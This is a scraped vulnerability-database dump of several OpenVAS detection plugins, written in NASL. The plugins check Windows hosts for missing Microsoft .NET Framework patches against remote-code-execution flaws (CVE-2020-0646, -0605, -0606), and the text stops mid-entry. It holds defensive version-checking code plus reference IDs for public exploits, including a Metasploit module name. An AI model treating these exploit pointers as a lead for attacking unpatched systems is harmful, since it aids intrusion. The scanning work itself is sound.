{"id": "OPENVAS:1361412562310815897", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532936)", "description": "This host is missing a critical security\n update according to Microsoft KB4532936", "published": "2020-01-15T00:00:00", "modified": "2020-06-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815897", "reporter": "Copyright (C) 2020 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-us/help/4532936"], "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "lastseen": "2020-06-05T15:41:52", "viewCount": 31, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:2A3F116D-DC02-4BEA-B9AD-39F7773274AE", "AKB:5635A082-A142-45A9-A677-DAB47F32BD83"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0216", "CPAI-2020-1031"]}, {"type": "cve", "idList": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0646"]}, {"type": "exploitdb", "idList": ["EDB-ID:48275"]}, {"type": "kaspersky", "idList": ["KLA11634"]}, {"type": "kitploit", "idList": ["KITPLOIT:4480301396595295532"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/SHAREPOINT_WORKFLOWS_XOML/"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0605", "MS:CVE-2020-0606", "MS:CVE-2020-0646"]}, {"type": "mskb", "idList": ["KB4532933", "KB4532934", "KB4532935", "KB4532936", "KB4532938", "KB4534976", "KB4534977", "KB4534978", "KB4534979", "KB4535101", "KB4535102", "KB4535103", "KB4535104", "KB4535105", "KB4552925", "KB4552926", "KB4552927", "KB4552928", "KB4552929", "KB4552931", "KB4556399", "KB4556400", "KB4556401", "KB4556402", "KB4556403", "KB4556404", "KB4556405", "KB4556406", "KB4556441"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_JAN_4528760.NASL", "SMB_NT_MS20_JAN_4534271.NASL", "SMB_NT_MS20_JAN_4534273.NASL", "SMB_NT_MS20_JAN_4534276.NASL", "SMB_NT_MS20_JAN_4534283.NASL", 
"SMB_NT_MS20_JAN_4534293.NASL", "SMB_NT_MS20_JAN_4534303.NASL", "SMB_NT_MS20_JAN_4534306.NASL", "SMB_NT_MS20_JAN_4534310.NASL", "SMB_NT_MS20_JAN_DOTNET.NASL", "SMB_NT_MS20_JAN_DOTNET_CORE.NASL", "SMB_NT_MS20_JAN_DOTNET_CORE_SDK.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815740", "OPENVAS:1361412562310815742", "OPENVAS:1361412562310815744", "OPENVAS:1361412562310815745", "OPENVAS:1361412562310815894", "OPENVAS:1361412562310815895", "OPENVAS:1361412562310815898", "OPENVAS:1361412562310816552", "OPENVAS:1361412562310816553", "OPENVAS:1361412562310816556", "OPENVAS:1361412562310816557", "OPENVAS:1361412562310817100", "OPENVAS:1361412562310817103", "OPENVAS:1361412562310817104", "OPENVAS:1361412562310817106", "OPENVAS:1361412562310817116"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156930"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-0605", "RH:CVE-2020-0606"]}, {"type": "symantec", "idList": ["SMNTC-111378", "SMNTC-111384", "SMNTC-111386"]}, {"type": "talosblog", "idList": ["TALOSBLOG:6A8FEAE9B7E20A5AA1A11907296891AF"]}, {"type": "zdt", "idList": ["1337DAY-ID-34152"]}]}, "score": {"value": 6.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:2A3F116D-DC02-4BEA-B9AD-39F7773274AE", "AKB:5635A082-A142-45A9-A677-DAB47F32BD83"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0216", "CPAI-2020-1031"]}, {"type": "cve", "idList": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0646"]}, {"type": "exploitdb", "idList": ["EDB-ID:48275"]}, {"type": "kaspersky", "idList": ["KLA11634"]}, {"type": "kitploit", "idList": ["KITPLOIT:4480301396595295532"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0605", "MS:CVE-2020-0646"]}, {"type": "mskb", "idList": ["KB4532934", "KB4532935", "KB4534978", "KB4535102", "KB4535104"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_JAN_4528760.NASL", "SMB_NT_MS20_JAN_4534271.NASL", 
"SMB_NT_MS20_JAN_4534273.NASL", "SMB_NT_MS20_JAN_4534276.NASL", "SMB_NT_MS20_JAN_4534283.NASL", "SMB_NT_MS20_JAN_4534293.NASL", "SMB_NT_MS20_JAN_4534303.NASL", "SMB_NT_MS20_JAN_4534306.NASL", "SMB_NT_MS20_JAN_4534310.NASL", "SMB_NT_MS20_JAN_DOTNET.NASL", "SMB_NT_MS20_JAN_DOTNET_CORE.NASL", "SMB_NT_MS20_JAN_DOTNET_CORE_SDK.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815740", "OPENVAS:1361412562310815742", "OPENVAS:1361412562310815744", "OPENVAS:1361412562310815745", "OPENVAS:1361412562310815894", "OPENVAS:1361412562310815895", "OPENVAS:1361412562310815898", "OPENVAS:1361412562310816552", "OPENVAS:1361412562310816553", "OPENVAS:1361412562310816556", "OPENVAS:1361412562310816557"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156930"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-0605", "RH:CVE-2020-0606"]}, {"type": "symantec", "idList": ["SMNTC-111386"]}, {"type": "talosblog", "idList": ["TALOSBLOG:6A8FEAE9B7E20A5AA1A11907296891AF"]}, {"type": "zdt", "idList": ["1337DAY-ID-34152"]}]}, "exploitation": null, "vulnersScore": 6.3}, "pluginID": "1361412562310815897", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815897\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532936\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4532936\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.8 on Microsoft Windows 10 Version 1803.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4532936\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.17134\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532936\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = 
\"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532936\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532936\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\")){\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "naslFamily": "Windows : Microsoft Bulletins", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"openvas": [{"lastseen": "2020-06-05T15:41:58", "description": "This host is missing an important security\n update according to Microsoft KB4535101", "cvss3": {}, "published": "2020-01-15T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535101)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310815898", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815898", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815898\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535101\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4535101\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5, 4.7.2 and 4.8 on Microsoft Windows 10 version 1809 and Microsoft Windows Server 2019.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4535101\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2019:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.17763\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4535101\n ## https://support.microsoft.com/en-us/help/4532947\n ## 
https://support.microsoft.com/en-us/help/4532937\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.9042\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.9042\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.7\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.7 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4535101\n ## https://support.microsoft.com/en-us/help/4532947\n ## https://support.microsoft.com/en-us/help/4532937\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.9042\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.9042\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.7\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.7 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## 
https://support.microsoft.com/en-us/help/4532936\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.7\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.7 - 4.7.3569\" ;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:56", "description": "This host is missing a critical security\n update according to Microsoft KB4535104", "cvss3": {}, "published": "2020-01-16T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535104)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310816553", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816553", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816553\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-16 11:32:54 +0530 (Thu, 16 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535104)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4535104\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Microsoft Windows 8.1 and Microsoft Windows Server 2012 R2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4535104\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n}\n\nkey_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\nforeach key(key_list)\n{\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532946\n ## https://support.microsoft.com/en-us/help/4532927\n ## https://support.microsoft.com/en-us/help/4532931\n ## https://support.microsoft.com/en-us/help/4532940\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.8832\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.8832\" ;\n break;\n 
}\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36576\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36576\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532946\n ## https://support.microsoft.com/en-us/help/4532927\n ## https://support.microsoft.com/en-us/help/4532931\n ## https://support.microsoft.com/en-us/help/4532940\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.8832\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.8832\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36576\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36576\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && 
\"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532931\n ## https://support.microsoft.com/en-us/help/4532940\n if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:55", "description": "This host is missing a critical security\n update according to Microsoft KB4532935", "cvss3": {}, "published": "2020-01-15T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532935)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310815895", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815895", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT 
ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815895\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532935)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4532935\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist 